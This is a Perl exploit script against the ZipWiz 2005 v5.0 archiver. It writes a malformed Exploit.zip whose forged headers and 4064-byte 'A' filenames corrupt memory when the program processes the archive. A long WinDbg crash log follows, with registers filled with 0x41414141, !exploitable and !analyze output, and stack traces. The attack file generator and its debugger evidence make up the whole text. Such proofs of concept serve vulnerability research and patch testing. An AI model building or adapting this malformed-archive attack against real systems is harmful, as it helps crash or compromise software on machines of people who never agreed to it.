#!/usr/bin/perl # #[+]Exploit Title: ZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit #[+]Date: 08\07\2011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://download.cnet.com/ZipWiz-2005/3000-2250_4-10011590.html #[+]Version: v5.0 #[+]Tested On: WIN-XP SP3 Brazilian Portuguese #[+]CVE: N/A # #
use strict; use warnings;
my $filename = "Exploit.zip";
print "\n\n\t\tZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit\n"; print "\t\tCreated by C4SS!0 G0M3S\n"; print "\t\tE-mail Louredo_\@hotmail.com\n"; print "\t\tSite www.exploit-br.org/\n\n"; sleep(1);
my $head = "\x50\x4B\x03\x04\x14\x00\x00". "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00\x00\x00" . "\xe4\x0f" . "\x00\x00\x00";
my $head2 = "\x50\x4B\x01\x02\x14\x00\x14". "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\xe4\x0f". "\x00\x00\x00\x00\x00\x00\x01\x00". "\x24\x00\x00\x00\x00\x00\x00\x00";
my $head3 = "\x50\x4B\x05\x06\x00\x00\x00". "\x00\x01\x00\x01\x00". "\x12\x10\x00\x00". "\x02\x10\x00\x00". "\x00\x00";
my $payload = "A" x 4064;
$payload = $payload.".txt"; my $zip = $head.$payload.$head2.$payload.$head3; open(FILE,">$filename") || die "[-]Error:\n$!\n"; print FILE $zip; close(FILE); print "[+] ZIP File Created With Sucess:)\n"; sleep(3);
=head1
(314.e4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=41414141 ebx=00bd7e50 ecx=55555551 edx=000eaac8 esi=00bd5290 edi=0050a1e4 eip=0045de1a esp=0006eaac ebp=0006eab8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010202 image00400000+0x5de1a: 0045de1a 8b44ca5c mov eax,dword ptr [edx+ecx*8+5Ch] ds:0023:aab955ac=???????? 0:000> .exr -1 ExceptionAddress: 0045de1a (image00400000+0x0005de1a) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: aab955ac Attempt to read from address aab955ac 0:000> dd edx 000eaac8 ffffffff ffffffff 00140014 00000000 000eaad8 34ceacb7 00000000 00000000 00000000 000eaae8 00000fe4 00000000 00240001 00000000 000eaaf8 00010000 00000000 0fe60000 01040000 000eab08 00000000 ffffffff ffffffff 00000000 000eab18 00000000 ffffffff ffffffff 00000006 000eab28 ba000000 baadf00d baadf00d baadf00d 000eab38 baadf00d ba00000d baadf00d 00adf00d 0:000> r eax=41414141 ebx=00bd7e50 ecx=55555551 edx=000eaac8 esi=00bd5290 edi=0050a1e4 eip=0045de1a esp=0006eaac ebp=0006eab8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010202 image00400000+0x5de1a: 0045de1a 8b44ca5c mov eax,dword ptr [edx+ecx*8+5Ch] ds:0023:aab955ac=???????? 0:000> !load winext/msec.dll 0:000> !exploitable -v HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address: 0xffffffffaab955ac First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) Exception Sub-Type: Read Access Violation
Faulting Instruction:0045de1a mov eax,dword ptr [edx+ecx*8+5ch]
Basic Block: 0045de1a mov eax,dword ptr [edx+ecx*8+5ch] Tainted Input Operands: ecx, edx 0045de1e cmp eax,8 Tainted Input Operands: eax 0045de21 ja image00400000+0x5de4d (0045de4d) Tainted Input Operands: ZeroFlag, CarryFlag
Exception Hash (Major/Minor): 0x00020e6f.0x3f7f6d68
Stack Trace: image00400000+0x5de1a image00400000+0x1e773 image00400000+0x1ef50 image00400000+0x1f024 image00400000+0xc0312 image00400000+0xbffef image00400000+0xbee0f image00400000+0xbf0c4 USER32!InternalCallWinProc+0x28 USER32!UserCallWinProcCheckWow+0x150 USER32!DispatchClientMessage+0xa3 USER32!__fnDWORD+0x24 ntdll!KiUserCallbackDispatcher+0x13 USER32!NtUserCallHwndLock+0xc image00400000+0x165a image00400000+0x538c5 image00400000+0x69b35 image00400000+0x6861a image00400000+0x24947 image00400000+0xc041e image00400000+0xbffef image00400000+0xbee0f image00400000+0xbf0c4 USER32!InternalCallWinProc+0x28 USER32!UserCallWinProcCheckWow+0x150 USER32!DispatchMessageWorker+0x306 USER32!DispatchMessageA+0xf image00400000+0xc373c image00400000+0xc31d8 image00400000+0xc49f3 Instruction Address: 0x000000000045de1a
Description: Data from Faulting Address controls Branch Selection Short Description: TaintedDataControlsBranchSelection Exploitability Classification: UNKNOWN Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at image00400000+0x000000000005de1a (Hash=0x00020e6f.0x3f7f6d68)
The data from the faulting address is later used to determine whether or not a branch is taken. 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * *******************************************************************************
GetPageUrlData failed, server returned HTTP status 404 URL requested: http://watson.microsoft.com/StageOne/image00400000/4_0_0_0/image00400000/4_0_0_0/0005de1a.htm?Retriage=1
FAULTING_IP: image00400000+5de1a 0045de1a 8b44ca5c mov eax,dword ptr [edx+ecx*8+5Ch]
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 0045de1a (image00400000+0x0005de1a) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: aab955ac Attempt to read from address aab955ac
FAULTING_THREAD: 000000e4
PROCESS_NAME: image00400000
ERROR_CODE: (NTSTATUS) 0xc0000005 - A instru o no "0x%08lx" fez refer ncia mem ria no "0x%08lx". A mem ria n o p de ser "%s".
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - A instru o no "0x%08lx" fez refer ncia mem ria no "0x%08lx". A mem ria n o p de ser "%s".
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: aab955ac
READ_ADDRESS: aab955ac
FOLLOWUP_IP: image00400000+5de1a 0045de1a 8b44ca5c mov eax,dword ptr [edx+ecx*8+5Ch]
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 70
APPLICATION_VERIFIER_FLAGS: 0
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141
PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ_FILL_PATTERN_41414141
DEFAULT_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141
LAST_CONTROL_TRANSFER: from 0041e773 to 0045de1a
STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 0006eab8 0041e773 00570d20 00bd7e50 00bd541c image00400000+0x5de1a 0006eb18 0041ef50 00bd5290 00bd5290 0041efa0 image00400000+0x1e773 0006eb44 0041f024 003ef170 00000000 0050a1e4 image00400000+0x1ef50 0006ebd4 004c0312 00bd5290 00bd5290 000a7320 image00400000+0x1f024 0006ec48 004bffef 0000000f 00000000 004f3de0 image00400000+0xc0312 0006ec68 004bee0f 0000000f 00000000 00000000 image00400000+0xbffef 0006ecc8 004bf0c4 00bd5290 000601b6 0000000f image00400000+0xbee0f 0006ece4 7e368734 000601b6 0000000f 00000000 image00400000+0xbf0c4 0006ed10 7e368816 004bf099 000601b6 0000000f USER32!InternalCallWinProc+0x28 0006ed78 7e378ea0 00000000 004bf099 000601b6 USER32!UserCallWinProcCheckWow+0x150 0006edcc 7e378eec 00784cd0 0000000f 00000000 USER32!DispatchClientMessage+0xa3 0006edf4 7c90e473 0006ee04 00000018 00784cd0 USER32!__fnDWORD+0x24 0006ee18 7e37aef1 7e37aedc 0006019e 0000005e ntdll!KiUserCallbackDispatcher+0x13 0006ee2c 0040165a 0006019e 004534b6 00000074 USER32!NtUserCallHwndLock+0xc 0006ee48 004538c5 00000001 0058c770 00000000 image00400000+0x165a 0006ee9c 00469b35 0052ca80 00000000 0058c770 image00400000+0x538c5 0006eec8 0046861a 00bd489c 00000000 0052ca80 image00400000+0x69b35 0006eeec 00424947 00bd489c 0052c404 00bd1530 image00400000+0x6861a 0006fcc8 004c041e 00bd4740 00000000 00bd1530 image00400000+0x24947 0006fd44 004bffef 00000425 00bd4740 004f5170 image00400000+0xc041e 0006fd64 004bee0f 00000425 00bd4740 00000000 image00400000+0xbffef 0006fdc4 004bf0c4 00bd1530 002201dc 00000425 image00400000+0xbee0f 0006fde0 7e368734 002201dc 00000425 00bd4740 image00400000+0xbf0c4 0006fe0c 7e368816 004bf099 002201dc 00000425 USER32!InternalCallWinProc+0x28 0006fe74 7e3689cd 00000000 004bf099 002201dc USER32!UserCallWinProcCheckWow+0x150 0006fed4 7e3696c7 0058c7a0 00000001 0058c7a0 USER32!DispatchMessageWorker+0x306 0006fee4 004c373c 0058c7a0 00000001 0058c770 USER32!DispatchMessageA+0xf 0006fef4 004c31d8 ffffffff 0058c770 0006ffc0 image00400000+0xc373c 0006ff0c 004c49f3 0058c770 004c55d5 010ef6ee image00400000+0xc31d8 00000000 00000000 00000000 00000000 00000000 image00400000+0xc49f3
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: image00400000+5de1a
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: image00400000
DEBUG_FLR_IMAGE_TIMESTAMP: 4399fa20
STACK_COMMAND: ~0s ; kb
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141_image00400000+5de1a
IMAGE_NAME: C:\Program files\ZipWiz\ZWP32.EXE
FAILURE_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141_c0000005_C:_Program_files_ZipWiz_ZWP32.EXE!Unknown
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/image00400000/4_0_0_0/4399fa20/image00400000/4_0_0_0/4399fa20/c0000005/0005de1a.htm?Retriage=1
Followup: MachineOwner ---------
0:000> lmvm image00400000 start end module name 00400000 0063f000 image00400000 C (no symbols) Loaded symbol image file: C:\Program files\ZipWiz\ZWP32.EXE Image path: image00400000 Image name: image00400000 Timestamp: Fri Dec 09 19:41:52 2005 (4399FA20) CheckSum: 00000000 ImageSize: 0023F000 File version: 4.0.0.0 Product version: 4.0.0.0 File flags: 0 (Mask 3F) File OS: 40004 NT Win32 File type: 1.0 App File date: 00000000.00000000 Translations: 0409.04b0 CompanyName: Synaptek Software ProductName: Zip Wizard Pro(tm) InternalName: zwp32 OriginalFilename: zwp32.exe ProductVersion: 4, 0, 0, 0 FileVersion: 4, 0, 0, 0 FileDescription: ZipWiz application file LegalCopyright: Copyright © 1994-2005 Synaptek Software LegalTrademarks: Synaptek, IntelliZip,ZipWiz Explorer,ZipWiz Navigator, ZipWiz, Zip Wizard Pro, Zip Pro are trademarks of Synaptek Software. 0:000> .exr 0xffffffffffffffff ExceptionAddress: 0045de1a (image00400000+0x0005de1a) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: aab955ac Attempt to read from address aab955ac 0:000> g (314.e4): Access violation - code c0000005 (!!! second chance !!!) eax=41414141 ebx=00bd7e50 ecx=55555551 edx=000eaac8 esi=00bd5290 edi=0050a1e4 eip=0045de1a esp=0006eaac ebp=0006eab8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202 image00400000+0x5de1a: 0045de1a 8b44ca5c mov eax,dword ptr [edx+ecx*8+5Ch] ds:0023:aab955ac=????????
=cut
|